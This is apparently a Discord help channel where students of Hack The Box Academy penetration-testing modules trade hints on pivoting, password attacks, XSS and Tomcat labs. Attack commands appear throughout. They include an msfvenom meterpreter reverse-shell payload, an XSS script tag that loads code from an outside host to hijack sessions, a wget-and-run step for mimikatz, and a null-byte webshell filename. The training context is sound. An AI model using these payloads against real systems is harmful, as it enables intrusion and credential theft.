I tried both .exe and .ps1. None of them are working. Is there some resource to look an example of how to run mimikatz when it's not on the target machine?

the idea is to have it on the machine

or to execute it in memory, but thats a different topic

is roadmap.sh cyber security roadmap good?

@spare condor Write again mimikatz.exe like wget http://ip address:port/mimikatz.exe mimikatz.exe

On the target (windows) machine? Without -OutFile ?

@spare condor It works the same

@spare condor how try to use invoke-webrequest

Hello! reverse connection?! in the module says nothing about it...

Hello, I`m looking for some help in the Port Forwarding with Windows Netsh module

anyone?!

ask a specific question bro and someone will help eventually

i recommend providing information on the module question and what you've tried etc

@arctic sentinel what is the problem

I`m taking with HTB staff... I can't open an rdp session on a remote server using the netsh.exe command

I have changed several vpn servers... maybe I`m doing something wrong...

is that port right?

8080

oh i see

It`s a random port I guess... there is no special mention as in why we should use 8080

@arctic sentinel Did you check the ip address on the listing address

In the listening address?!

with netstat command?

@arctic sentinel is it skills assessment or

No, it`s the Port Forwarding with Windows Netsh

@arctic sentinel You will use the thr ip address that is given

what ip address? I should rdp to another network using the windows host as pivot no? netsh is telling the host to portforward to 172.16.5.19 no?!

Hey guys, I am trying to solve 'Attacking DNS' Lab from the Attacking common services lab

and I am stuck at the subbrute part

the subbrute.py command doesn`t work?!

I have added the resolver (as per the module's description)

but it results in defaulting to the system's resolvers

I've added the ns1.inlanefreight.htb resolver only

You want to discover the zones?!

yeah

I have in my notes that I used the subbrute command...

well, I think it's pretty straightforward...

git clone https://github.com/TheRook/subbrute.git >> /dev/null 2>&1

cd subbrute

echo "ns1.inlanefreight.com" > ./resolvers.txt

./subbrute inlanefreight.com -s ./names.txt -r ./resolvers.txt

i've even added the -p flag that prints ANY DNS records in all found subdomains

what error you get?!

No nameservers found, trying fallback list.

It`s been a while since I did this one 😦 I don't remember doing anything special

try another vpn server maybe...

@arctic sentinel yes

I was given a hint of using a simple remote connection... it`s done! 🙂

Ok

https://academy.hackthebox.com/module/158/section/1427

I'm trying to do this academy section on reverse port forwarding, but I am stuck at the point where you have to run the ssh -R command to get the pivot bounce back traffic from the windows target machine on to my kali box which has a reverse shell listening on port 8000. Here's the diagram I have created of what I am trying to achieve:

ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@172.16.5.19 -vN

This command when I try run on my kali box shows the following error:

Would someone know what's causing this not to work?

Fails even with the proxychains command 😦

are you sure the target has port 22 open?

yes I have nmap the windows target and it's open

from the error message seems otherwise

Another point to note, I can ping the pivot machine's 10.129.x.x. IP, but I cannot ping its "Internal" IP of 172.16.5.129 and neither that of windows target machine on 172.16.5.19

I have transferred the payload from kali box to pivot------------> Pivot to windows target machine as I served a python server and RDP into the windows target from where I pulled the file from the middle box, the pivot. I have run the payload script manually on the windows machine as well as administrator.

what's your kali tun0 IP

I had created the initial ssh dynamic port forwarding with the pivot box by the following command:

ssh -D 9050 ubuntu@10.129.x.x

nvm

10.10.15.140

Pivot's IP 10.129.110.212 and its internal IP 172.16.5.129. Windows target Ip 172.16.5.19

I can ping the pivot's 10.129.x.x IP, but cannot ping the other two internal IPs

port 22 is not opened on .5.19

Hey all, looking for a nudge with Password attacks; credential hunting in Linux. I can seem to figure out what to do and what the hints suggests 😅

Have you got access to the course content? If you have then would you please check how reverse port forwarding will work as I can't get it to work from this point onwards.

¯_(ツ)_/¯

I might have already finished the CPTS path, but who knows

Hmmm strange, not sure how they got it to work on the course material

ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@172.16.5.19 -vN

huh

idk why i was overthinking this

you're SSHing into ubuntu@172.16.5.19

also, from what I can see in the exercises (questions) below you are not asked to get a rev shell on the windows internal target

According to the command not sure why it's sshing into windows target and ubuntu user doesn't make sense

the logs below are showing what happens after you execute the payload

I set up OpenVas on my Kali yesterday, but I missed, that you have to note down credentials. I tried to reset the admin-password, but it didn't work. What do you recommend me to do?

It fails on port 22 and doesn't generate any logs

ssh into the pivot host instead of the windows box

tried swapping IPs too 😦

what's your command

ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@172.16.5.19 -vN

On top of that, if you carefully follow the instructions you will get a reverse shell, you must understand what to write as an IP address for the -R command

Again, the 5.19 host does not have port 22 open

that's the windows box you're sshing into..

Followed the command syntax as shown 😦

Hey, someone can help ? I’m on the module password attack for user Sam on ssh founded ftp tried bruteforce on both but nothing return

Please

The syntax is not using the internal IP address of the windows target

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

And still, doesn't mention the windows internal host

that the question: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer.

it might help if you look at the command like this

I'm working through Attacking Enterprise Networks/Internal Information Gathering. I'm trying to do the SSH pivot. I've done it before on other machines, but I can't seem to get it to work on this lab. I'm following the steps. I first did ssh -D 8081 -i dmz01_key root@10.129.203.111, but the next step in the section is to do netstat to verify that ssh is listening on that port, but I get docker-proxy. So I change it to 9050, but netstat doesn't give me anything on that port. When I try the next step of proxychains nmap, it doesn't work. Any thoughts?

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

It worked, I changed IPs and used both pivot IPs 😦

ssh -R 172.16.5.19:8080:0.0.0.0:8000 ubuntu@172.16.5.129 -vN

Thanks I need to open my eyes and understand what's the syntax saying !

@dim wolf Thanks for helping 🙂

run the payload and make sure it actually works

Repost:

Hey all, looking for a nudge with Password attacks; credential hunting in Linux. I can seem to figure out what to do and what the hints suggests 😅

It's not getting the reverse shell, although now it's showing the logs on kali box and reverse port forwarding is working. Not sure what's wrong now.

Am I the only one who struggles with Windows PrivEsc Skill Assessment I ?

Got RevShell through command Injection, but nothing works (tried winpeas, wes, powerup ; and all the assosiated methods and CVE

I tried Windows PrivEsc Skill Assessment II and solved all in 20min ... someone has a hint ?

damn this new thick applications section though😂

have you checked the hint

Yes I bruteforced all running services with both usernames. The one in description and the one in the hint. Also tried using the hint given password

Think I am missing a high level view of what the task wants from me 🧐

you need to mutate it

Oh

Thanks, will try that !

@autumn pilot Any insight into why reverse shell is not spawning now as reverse port forwarding is working. Possibly the payload? Not sure

payload

Generated the payload using the following command:

msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InteralIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

of course changed the IP to 172.16.5.129

you need to specify it in the console as well

I did run that in my Kali terminal and it generated the backupscript.exe file

anyone finish the new Attacking Thick Client Applications? I understood up until the memory maps section😅 keep getting a The file isn't a .NET PE file

Sorry didn't get this bit, what you mean run in the console? 🙂

think

I'm not going to give you the answer, as it is already explained somewhere, and is not hard to get to it

Got it, thanks 😂

I got it, but not sure why this worked...so if someone understands memory maps and could explain, my dms are open to you🙏

hi, can I dm you? I am stuck at this module

Hi there , Does the XXEinjector can execute the error based method?
Could someone give me a hint?

unfortunately, I'm not really qualified to help on that section😅 the only way I could help is by giving the answer which I don't see as beneficial. all I'll say is look at the pictures and reread and you'll be able to tell what to dump. once I get an explanation and actually understand what's going on I'll be able to help you 🙂

One such tool is XXEinjector. This tool supports most of the tricks we learned in this module, including basic XXE, CDATA source exfiltration, error-based XXE, and blind OOB XXE. - From the Automated OOB Exfiltration section. so to answer your question, yes it can be used for error-based XXE

Anyone able to help with the Broken Authentication module - predictable reset token question 1? I feel like I've tried everything at this point and I can't even seem to recreate the generated hash for htbuser.

are you asking how -dump works?

anyone knows why on ATTACKING ENTERPRISE NETWORKS Lateral Movement I receive the following error when trying to escalate privileges?
C:\Windows\system32>net localgroup administrators ilfserveradm /add
'net' is not recognized as an internal or external command,
operable program or batch file.

oh, I fail in the error based and CDATA.. I will study it again. Thanks!

what section is this?

that's the module, what section are you in

look at the right hand side, the Table of Contents.. what section are you asking about.

you do need the --dump flag if you want to "dump" the content of a specific table.

Hello guys!
One thing in the Vulnerability Assessment module > Nessus Skills Assessment the question " What were the targets for the authentication scan ?" Where exactly I need to see, like I answered all the other questions about nessus, this one is the last one and I cannot understand where I need to see to get the answer!

if you look at the scans what is the host. ||It's looking for the IP address of the target scanned||

😘

After two days of trying I have finally got the rev shell on my kali box. Learnt a ton during all this, more about myself 🙂

: |, I literally try everything because I thought that answer was to abvious to be the real answer.

I guess I need to use the philosophy of keep things simple.

Thank you!

@rustic sage

it basically asks you what was the target(s) that have been scanned

How do I be a hacker?

Getting frustrated everyday on a problem that seems impossible to solve but then solving it is my strat

On host #1 of the Live Engagement for Reverse Shells and Payloads - ||Does anybody know what the second vulnerability is on host1? The hint says "This host has two upload vulnerabilities.", I found and exploited the one using apache tomcat succesfully, (port 8080), but on port 80 is there a separate one that I am missing? ||

Did the "Attacking Common Applications" module grow overnight? I thought I was finished with it!

Yep~ But if it was already done, you probably don't have to redo it to start the cpts exam. I just started the exam this morning w/o doing the new content

11 new sections including a new skill assessment, good luck on the thick applications part😅

I just finished the Skills Assessment III. That was easy. @rustic sage if I have issues with that, can I ping you?

GL, @steady totem

I can somewhat help with Attacking Thick Client Applications, I'm still struggling with Exploiting Web Vulnerabilities in Thick-Client Applications though

I should get to that later today. I'll look for you then. 🙂

Hey friend !!!
i'm stuck here
Password Attack Lab -Medium
Examine the second target and submit the contents of flag.txt in /root/ as the answer.
||i'm in jason user , don't know further , for dennis and root access||,|| I suppose I should look at the services but I don't know what to do||...HELP!

maybe there is a hint in that document you download 😉

theres a certain cycle of mentality you should get into for these things. Once youve elevated access you should think "What can I plunder?" look for creds, secrets, ect. then go to enumeration of, "what can I access that I couldnt before, what can this user use that I couldnt earlier?"

but have a plunder first mentality

and this is a general tip, not just for that skill assessment

ok

I ran a full 94.000 list on the Will user and the Kira user :<

You don't need a 94,000 words wordlist

That was the mutated one from the previous module :<

Can i DM you too?

Can I dm someone regarding a hint of the LFI Skill assessment?
Was able to get the source code of index, but I'm stuck with the RCE.

Something might have clicked. Maybe mutating the one given password is an option

anyone has been able to submit the uname value as the answer for the new thick client stuff?

I need help for SMB, footprinting module. For the third question: “Connect to the discovered share and find the flag.txt file. Submit the contents as the answer”.

I found flag.txt and opened it and got the flag but when I submit it, HTB said it was wrong. Did I misunderstand the question?

probably an errant space

you can dm me

tbh I think thick client could've and should've been it's own module that was a lot😅

In Broken Authentication - Brute Forcing Cookies I was able to get the answer to the second question with the help of Cyberchef's Magic functionality. I was able to determine the first two encoding methods by looking at them, but for the last one I'm not sure how I could've identified it. Would someone be able to explain to me how to identify the last encoding method manually please? I tried magic numbers, but I couldn't find any that match

I can't get any entry with "Credential Hunting in Linux" been using the mutated password of Kira with the ftp and ssh service, to no avail. Anybody who care assist?

hello when i try to connect to xfreerdp server for this module (Packet Inception, Dissecting Network Traffic With Wireshark) i have (bash: xfreerdp: command not foud ) any solution

I made a mistake

install xfreerdp 🙂

ok

Hello,
I'm doing the SQLi Fundamentals model, I'm doing the exercise for this section Subverting Query Logic.
I'm able to login, I already have the passwords for all users, but I'm unable to find the flag.
some help will be appreciated.
Thanks

Try to log in as the user 'tom'. What is the flag value shown after you successfully log in?

Anyone around for a question on the Shells & Payloads skill assessment?

https://www.infosecarticles.com/exploiting-shellshock-vulnerability/. So I'm trying to wrap my head around the ShellShock vulnerability in Unix systems(CVE-2014-6271). I MOSTLY understand the mechanics behind it. The linked article mentions the following ```
The User-Agent value used in curl is stored as an environment variable on the remote machine. By default, this is set to HTTP_USER_AGENT = curl/7.47.0 when using curl. However, this value can be modified. We can store malicious code that sets up a reverse shell inside this environment variable.

its a weird way they wrote it, it has nothing to do with curl

the vuln is how the server is passing the user agent header from clients. curl has a default user agent that you can set, but whatever client you use so long as you put it in the user agent is good enough.

for this particular scenario at least

plenty of shellshock vuln systems have nothing to do with user agents

Yep, something obvious 😒

@thorn urchin So do ALL servers store the User-Agent value in the environment? Seems kinda strange. I looked for explicit answers to this on the google but none of the answers make sense.

can you talk on this serrver and if so how

no youve completely misread it(cause its written badly)

this exploit has nothing to do with environment variables

also just realized this is the modules channel, which is off topic

can somebody please awnser me3

#rules and #welcome

thx

but can somebody awnser me how do i talk

read the channels

this channel is for module discussion, not newbies first discord how to

@thorn urchin The question stems from "Attacking Common Gateway Interface (CGI) Applications - Shellshock" in the Module "Attacking Common Applications". It mentions environment variables as the means through which this exploit can be achieved. I'll do some more research on it. Thank you for your responses.

Can someone help me with https://academy.hackthebox.com/module/143/section/1279 obtain credentials for CT059???

Inveigh.exe and Inveigh.ps1 not working at all

ok good. and yeah the sticker with shellshock was how many different possible avenues of exploitation there are. in the link provided the env variables are not relevant, its just telling you were your curl client default gets the user agent from.

AAAHH I see

well inveigh is the way, so either the ones your using are wrong, youre using the tool wrong, or youre using it on the wrong box.

Okey so spawn this machine and try it out :))

ive already completed the module and looked at my assessment notes :))

Good to know

Now its not working anymore

well I reiterate the conditions I said above

I do it so for every version that was release

On MS01

I dm u

sure

would anyone be able to assist me in XSS session hi-jacking section?

been stuck for a day. I can't seem to find the correct payload.

ATTACKING COMMON SERVICES Attacking SMB
Login as the user "jason" via SSH and find the flag.txt file. Submit the contents as your answer
I found the password for jason but cant login to SSH
Can someone give me a hint

"><script src=http://URL:Port/script.js/></script>

And then the sript.js and index.php from before

Hmmm. Still having a hard time. I did both username, and fullname fields

bit of a spoiler there

smbclient -U jason -L ////10.129.254.186//GGJ
Enter WORKGROUP\jason's password:

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
GGJ             Disk      Priv
IPC$            IPC       IPC Service (attcsvc-linux Samba)

SMB1 disabled -- no workgroup available

Does someone know how to get arround this SMB1 disabled

dont need to

also yeah, we do hints here, giving out answers outright is bad

SRY

To be fair. I for some reason thought the text said to only test the username and fullname field. I was throwing payloads at it for the past day. Definietly a noob moment for not even trying the other fields

weve all had those

I do appreciate the nudge. I was getting frustrated

as for this. it does say to SSH. BUUUT i think there are other tools have support for smb2 that could also grab that flag

i need to get that id_rsa from the smb right?

its been a while since ive done that specific module i cant remember if there was an id_rsa. if there is then yes. if not then there should be a way using cme. which i used to grab the flag

The Share GGJ is READ ONLY

In the Network Enumeration with Nmap Academy module in the Host Discovery Module, the question is what operating system the Machine in question is running, I guess it to be || Windows || and I was right, I guessed that based off of || [ttl=128 id=40622 iplen=28 ] || with the || ttl || Is that the way I was supposed to know it or was there something else that I should have paid attention to? I guessed right the first time but what bothers me is that I guessed and didnt know

thats fine if its read only

scoop up any useful bits from it

Plunder -> Enum -> Exploit

If you do packet tracing it will tell you in some of the packets

|| Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 00:12 CEST
SENT (0.0107s) ICMP [10.10.14.2 > 10.129.2.18 Echo request (type=8/code=0) id=13607 seq=0] IP [ttl=255 id=23541 iplen=28 ]
RCVD (0.0152s) ICMP [10.129.2.18 > 10.10.14.2 Echo reply (type=0/code=0) id=13607 seq=0] IP [ttl=128 id=40622 iplen=28 ]
Nmap scan report for 10.129.2.18
Host is up (0.086s latency).
MAC Address: DE:AD:00:00:BE:EF
Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds || was the entire response

|| sudo nmap 10.129.2.18 -sn -oA host -PE --packet-trace --disable-arp-ping || was the prompt

where does it tell me?

Iirc you need the -O

Which does an OS scan

I didnt actually do this scan, the input and output is given in the module

... run the scan brother

And you'll get an answer

I cant

there is no live machine to scan

There should be?

its not an interactive lesson with a machine

doesnt show as interactive either

Let me double check

It's been a minute

this is what im refering to

Ah yeah that part

weird I dont remember that, but in such case yeah the ttl is how you were supposed to know

RCVD ttl

so with the read only i cant download them

Yeah thats how I guessed it in the first place, but I wasnt sure that it was the way I was actually supposed to solve it in this case, so I asked just to make sure ^^

read only definitely gives you download access

how are you trying to download the files

https://www.binbert.com/blog/2009/12/default-time-to-live-ttl-values/

smbmap -H 10.129.254.186 --download "GGJ/id_rsa"

it might be funky but atleast you could copy and pase the output into a textfile

Thank you, ill bookmark that for further references. Cheers

if you just google "how to determine OS from TTL" it should give you a handful of things that have these types of tables

I have to giv the user and the password right

?>

ive not used smbmap for this. use smbclient normally and see if that file is even there

^

not to say smbmap cant work, but im not familiar with it enough to know if your usage is correct

worked with user and password dumb of me

can I get some help with footprinting dont get this question What is the "FQDN of the host where the last octet ends with "x.x.x.203"?" i use dnsenum --dnsserver 10.129.42.x --enum -p 0 -s 0 -o subdomains.txt -f /home/kali/Desktop/SecLists/Discovery/DNS/combined_subdomains.txt --threads 90 inlanefreight.htb

you need to find/enumerate all the zones

is it not what I am trying to do with dnsenum ?

@rustic sage

You can dig it;)

you can dm me for another hint

yea I already found the internal

what about second internal

im working with curl and the http methods and the question is "First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag." i did all of that and search for the city and as a response i just get this

How do people who are in top 100 learn?

Surely they don’t go right into with infinite knowledge

dont know dont care. this channel is for module discussion only. read #rules and #welcome

Hi Guys, I'm getting an error when running the tomcat mgr in metasploit where it says that failed to deploy the payload.

I'm using java/reverse_shell_tcp

i'm currently in the Live engagement of shells and payload module

Not sure about in that module - but they used a different payload in Attacking Common Applications - Attacking Tomcat that's probably worth noting

maybe. Idk if that'll solve it or not for you

Hi guys! hope yall are doing well!
I'm stuck at the Password Attack - Password Mutations modules, i found another user besides the one provided and its password, but all it gave me was access to an empty SMB directory, can someone give me some pointers?
I tried access through RPC, NFS, tried to use the same user in another available services with the mutated password list, tried to use the same password with the wordlist of usernames. Nothing worked, i'm kinda lost. Also, sorry if i misspelled something, english is not my native language.
Thank you!

I'm using the tomcat manager authenticated upload in metasploit but getting the error of failed to deploy payload

exploit/multi/http/tomcat_mgr_upload

I'm also using the correct credentials

yes. I'm saying maybe you should try a different payload...

Hello! I'm stuck on the "Network Enumeration with Nmap-Nmap Scripting Engine ". I've enumerated all ports and ran the 'http-enum' script. "||sudo nmap -p- --script http-enum 10.129.162.102 --stats-every=60s||"
found a robots.txt on 80 port, which looks like it has the flag in it, but won't work when I input it on the site. Any help?

dm

Okay, I need some help with the Attacking Thick Client Applications module. So I'm on the memory map part. Using x64dgb I got to the banner. In the instructions it says that "there should be an interesting new map added after the ASCII banner is being displayed". The next step is to import the mapped item from memory. So I've dumped litterally every single MAP type in the memory map and ran strings and de4dot on them all and none of them are .NET executables... has anyone been able to solve this one? I'm totally stumped.

Hello, Im doing the file uploads module im in whitelist filters lesson, i put a web shell with shell.php\x00.gif but i cannot access to him, somebody can help me?

that extension could be a false-positive

and how can try it?

hi, in LF module the problem child, I understand " dpkg -l | grep " but once I use " -c '^ii' I dont understand that one, I get checking the history with " -c " but dont understand the next part of the bash script

also the question is to find how many total packages are installed on the target system

What module are u?

Hello i wanna ask about ssh attack why its too long

actually its same

Anyone fixed this issue for Oracle TNS
sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory.

solution here
https://stackoverflow.com/questions/27717312/sqlplus-error-while-loading-shared-libraries-libsqlplus-so-cannot-open-shared

creating the oracle.sh file:
/etc/profile.d/oracle.sh

ORACLE_HOME=/usr/lib/oracle/19.6/client64/lib
PATH=$ORACLE_HOME/bin:$PATH
LD_LIBRARY_PATH=$ORACLE_HOME/lib
export ORACLE_HOME
export LD_LIBRARY_PATH
export PATH

run this command:

source /etc/profile.d/oracle.sh

and this command:

export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib:$ORACLE_HOME

The section "Attacking Thick Client Applications" from "Attacking Common Applications" requires knowledge of reverse engineering, which was never taught before... How do i get through this? Where can i learn all the tools presented there? I got lost... 😦
And also, it is impossible to start PS once inheritance is removed... I had to re-enable it for PS to work - but then it deletes the file after one x64dbg run. Really frustrating

Hello
How can I read dovecot file index?

I'm in Hard lab of footprinting

Considering doing the course and was hoping to hear from others, have any of you guys tried this course and have any advice? Reviews?

I'm doing getting started => public Exploits Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start) and when I use msf i get this message (requires mod_cgi to be enabled)?

https://www.youtube.com/watch?v=dRW1Gxmu__Q

https://youtu.be/6ISUuMBzCyo

https://www.youtube.com/watch?v=UN5fTQtlKCc

Has someone finished the updated bloodhound skill assessment?

yes, where are you stuck?

Last question to be fair, can't visualise how to build the cipher query to return a number, as the one I currently have is incorrect

For this question you need to work directly in the Neo4j browser
http://localhost:7474/browser/

yeah, I'm aware, however the parameters(queries) are the things that I'm facing an issue with

You can send me a DM

Hey guys, just working on the intro to bash module and already stuck at the first taks haha, is the module enough for me to understand this and be able to replicate or what? How should I approach it, I am new to scripting so limited experience

Does anyone else has connectivity issues with Pivoting, Tunneling, and Port Forwarding Skills assessment?

Hi,
I'm stuck on attacking common application in Tomcat section at question What role does the admin user have in the configuration example?
there should not be a great complexity but I don't know what I should look for.

in the configuration example above, what role does the admin user have. I don't see the complexity?

you're learning something new it's always going to come with ups and downs! just keep at it and practice, you can also watch some videos to help! I will say I love bash scripting because I've automated a lot of my setup process so if I ever have to change VMs all my tools will be there

Well, there are several pages of examples and I don't understand what they are asking me.
As I said, it's probably very stupid but I don't know where I should look

it's one page... and it only shows one configuration file where it lists users and their roles?

Ok lol i have it ! 😅
I was looking for an answer on the website ...

read the questions carefully, it says in the example.

Thanks mate yeah I've committed myself to learning the basics of bash, python and PS

Yes but just before we are asked the version of Tomcat on a website so I did not understand the question which yes was evident.
Thanks for your reply.

fair, they'll sometimes do that. just keep in mind whenever they say "example" it usually refers back to what you just read 🙂

anyone know if there has been a fix for Exploiting Web Vulnerabilities in Thick-Client Applications? It's the only section I have left😅

I am doing attacking common applications - attacking wordpress and found the flag in the webroot or so I think but its not taking it. I have no spaces or anything. is someone there that can validate that i have the right flag?

you can dm me

I need someone to get into an account for me

I don't think so, the hostname rotates every reboot. It doesn't take my flag, but it's different every time

Anyone willing to do so?

were you able to do the previous one, Attacking Thick Client Applications? I couldn't get the memory dump to work

this is not the place to ask this.. please read #rules

Ok

yes I'm aware...☹️ as for Attacking Thick Client Applications I did solve it, but I'm still looking for an explanation on that.. I'm not really qualified to help and the only assistance I can provide is the answer which isn't helpful.

I was thinking of trying to open the exe in Ghidra, but that seemed like a rabbit hole

so the steps did work for you in the section?

I wasn't sure if there was something missing, or if I was missing something

yes just reread and look at the images and you should be set! I'm waiting for an explanation before I offer more assistance into that part of the lab

ok, I'll revisit it. I was staring at the asm until I was cross eyed

Hi can someone help me with Attacking Common Services Skill Assessment Hard?

?

https://dontasktoask.com/

i am using crackmapexec and the brute force attack stops after one itteration. I tried Null session to smbclient but it doesn't allow. i am using users.list and pws.list. Am i doing something wrong?

||take a look at SMB again||

Hi, in the sqlmap essentials module, running sqlmap on an http request section, I'm trying to answer the second question, what's the contents of table flag3? (case #3 - cookie id)
When executing the command sqlmap -u 'URL' --cookie='id=1' ,
sqlmap gives me an error that the parameters were not found, any ideas?

I don't remember exactly, but try putting a * by the 1. If that doesn't work I'll try spawning up the lab again.

that was what i needed, ty

Yes, finally completed the LFI skill assessment. If anybody needs a hint, let me know.

very helpful and worth looking into 🙂

HI
I'm stuck on attacking Tomcat for find and submit the contents of tomcat_flag.txt
Impossible to find where is this flag !

it's not "impossible"

what have you tried / where are you failing / do you know why it isn't working? ||pretty sure for this one you just exploit the built-in functionality as taught in the section||

Well yes I have a webshell having uploaded a .war file
I have access to the root folder.
I'm going through all the folders.
The find command goes around in circles without giving me anything.
I don't understand the subtlety to find this flag.

I don't remember where the flag actually is, so if you have a web shell go searching. I can tell you it's not impossible as I have solved it.

can anyone help iam at footprinting medium iam in the database but i cant find any HTB users

Request for Help. Module: Footprinting - MySQL
Q: During our penetration test, we found weak credentials "robin:robin". We should try these against the MySQL server. What is the email address of the customer "Otto Lang"?

I enumerated the MySQL service and was able to get a dump of names and email addresses -- HTB isnt taking the email as the appropriate answer?? Not sure if I'm screwing up something in MySQL or if there's an error with HTB.

if you want to dm me with your find command I'll check it out

excuse me, I am a noob with discord. How can I up load a picture? I have a question to ask. TK

||Look for a non-standard database, once you find that look through the tables.||

hi @rustic sage I have sent u something on ur dm

you need to verify your account #welcome before being able to

are you sure you have the correct email? ||Don't dump all email address, search for customer where it is "Otto Land"||

i know u have those 4 standart databases but the rest does not contain anything use full

I just refined my MySQL query to dump only the record for "Otto Lang" and its the same email. HTB isn't taking it as the correct email.

any leading or trailing whitespaces?

there should be one non standard database that you should look into.

I literally just did that as you were typing and it might have been the issue. Lol. Thx.

is it the A******* one?

that would be the non standard one 🙂 do some digging now

@rustic sage this is the output i got for 445 smb